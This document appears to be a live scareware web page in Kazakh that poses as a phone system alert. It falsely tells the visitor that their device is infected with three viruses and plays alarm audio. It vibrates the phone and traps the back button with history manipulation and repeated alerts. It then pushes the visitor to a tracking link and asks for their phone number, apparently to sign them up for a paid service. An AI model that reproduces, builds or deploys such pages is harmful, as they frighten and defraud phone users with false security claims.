<!DOCTYPE html><html><head>
  <base href="">

    <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <meta content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width" name="viewport">
    <meta content="#ff0000" name="theme-color">

    <title>ЖҮЙЕ ЕСКЕРТУІ!</title>
    <script type="text/javascript">/*<![CDATA[*/function getURLParameter(e){return decodeURI((RegExp(e+"=(.+?)(&|$)").exec(location.search)||[,null])[1]||"")}/*]]>*/</script>
    <style>body { margin: 0px; padding: 0px; background-color: rgb(206, 52, 38); }
a, a:visited, a:hover { color: rgb(255, 255, 255); }
p { margin: 0px; padding: 8px 0px; }
input { border: 1px solid rgb(255, 255, 255); float: left; margin: 0px 10px 0px 0px; }
#wrap { width: 90%; max-width: 600px; margin: auto; padding-top: 10px; padding-bottom: 20px; color: rgb(255, 255, 255); font-family: "Roboto",sans-serif; font-size: 14px; font-weight: lighter; }
.small { font-size: 12px; }
.big { font-size: 20px; }
.text-center { text-align: center; }
.button a, .button a:visited, .button a:hover { display: block; background-color: rgb(212, 82, 70); color: rgb(255, 255, 255); padding: 10px; text-decoration: none; border-radius: 2px; width: 200px; margin: auto; }</style>
    <script type="text/javascript">!function(){navigator.vibrate=navigator.vibrate||navigator.webkitVibrate||navigator.mozVibrate||navigator.msVibrate,navigator.vibrate([1e3,500,1e3,500,1e3,500,1e3,500,1e3,500,1e3,500,1e3,500,1e3,500,1e3])}();</script>
 </head>
 
  <body>
  	
  	<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>
    <div id="wrap">
      <a class="btn" id="linker">
        <p><img style="width: 50px;" src="222.png"></p>
      </a>
      <strong><p class="big">ЖҮЙЕ ЕСКЕРТУІ!</p></strong>
      <p><script>document.write(getURLParameter('brand'))</script> <script>document.write(getURLParameter('model'))</script> құрылғыңызға жақында кірген зиянды веб-сайттардан 3 вирус жұққан.</p>

<p>
					Вирустар дереу жойылмаса, телефонды құлыптап, жеке файлдарды бүлдіруі мүмкін.				</p>
					
					<p>
					<strong>Телефонды дереу қорғау үшін мына қадамдарды орындаңыз:</strong>				</p>

      <p><u><strong><a class="big">1-қадам:</a></strong></u> төмендегі түймені басыңыз да, жүктеп алуды бастау үшін келесі бетке телефоныңыздың нөмірін енгізіңіз.</p>
      <p><u><strong><a class="big">2-қадам:</a></strong></u> кез келген вирусты жою үшін вирусқа қарсы бағдарламаны іске қосыңыз.</p>

      <p style="font-size: 20px;" class="text-center button"><a class="btn" id="linker" href="https://zebix.bemobtrk.com/click"><strong>ҚАЗІР ЖӨНДЕУ</strong></a></p>
    </div>
    
     <audio autoplay="autoplay" preload="">
    <source src="default.mp3" type="audio/mpeg">
    <source src="default.ogg" type="audio/ogg">
  </audio>

<script type="text/javascript">
    
  var fakepath=document.URL;
  
  window.history.pushState('index.php', 'gogogo', fakepath);
  window.history.pushState('index.php', 'disone', fakepath);

  window.addEventListener("popstate", function(e){if(document.URL.indexOf(fakepath) >= 0){
    window.history.pushState('index.php', 'gogogo', fakepath);
    window.history.pushState('index.php', 'disone', fakepath);
    if (document.getElementById('snd')) {
      document.getElementById('snd').play();
    }
    alert('Егер бұл бірнеше минутта шешілмесе, вирус SIM картаны зақымдап, контактілер мен жеке деректерді бүлдіруі мүмкін.');
  }});

</script>

</body></html>
